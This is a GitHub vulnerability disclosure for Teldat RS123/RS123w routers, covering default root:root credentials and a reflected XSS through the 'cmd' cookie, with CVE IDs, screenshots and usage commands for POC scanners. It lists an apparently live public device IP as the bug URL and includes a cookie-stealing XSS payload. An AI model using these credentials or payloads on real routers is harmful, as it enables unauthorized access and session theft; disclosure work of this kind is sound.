# Teldat-s-Router
Reflected xss and weak password vulnerabilities in Teldat's Router；
bug url:http://189.206.168.49/upgrade/index.html
Vulnerable version: RS123, RS123w
1.weak password (CWE-521: Weak Password Requirements)
Account:root
password:root
Vulnerability proof:
![image](https://user-images.githubusercontent.com/38815439/187359831-81c7aa38-9428-4b5a-8c6e-e91a300f263c.png)

2.Reflected xss vulnerability
After logging in, enter the background and capture packets Restart;
![image](https://user-images.githubusercontent.com/38815439/187360420-ede1e1d2-8df8-45ec-9ba3-8082f75b29da.png)
Entering aaaa and returning aaaa, it is suspected that there is a reflective xss vulnerability
![image](https://user-images.githubusercontent.com/38815439/187361294-caa42e23-c68e-4f42-a1f3-8e1c125d05d8.png)
I went to the cmd cookie and wrote the xss payload and the pop-up was successful
![image](https://user-images.githubusercontent.com/38815439/187361658-2b24b895-ab0c-47fd-b6fe-d569fa4d011d.png)
View the effect on the browser:
![image](https://user-images.githubusercontent.com/38815439/187362213-273af07e-9fdb-40fe-8d65-805ceef76072.png)

---

## CVE Assignments

| CVE ID | Type | CWE | CVSS | Severity |
|--------|------|-----|------|----------|
| CVE-2022-39996 | Reflected XSS | CWE-79 | 6.1 | Medium |
| CVE-2022-39997 | Weak Password | CWE-521 | 9.8 | Critical |

---

## POC Scripts

### Requirements
```bash
pip install requests paramiko
```

### CVE-2022-39997 - Weak Password POC
Check for default credentials `root:root` across multiple services:

```bash
# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1

# Full check (all services)
python CVE-2022-39997.py -t 192.168.1.1 --all

# Scan multiple targets
python CVE-2022-39997.py -f targets.txt
```

### CVE-2022-39996 - Reflected XSS POC
Test the XSS vulnerability via the `cmd` cookie parameter:

```bash
# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1

# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root

# Test multiple XSS payloads
python CVE-2022-39996.py -t 192.168.1.1 --multi

# Generate standalone POC HTML
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc

# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"
```

### Disclaimer
These POC scripts are for educational and authorized security testing only. Do not use against systems you do not own or have explicit permission to test.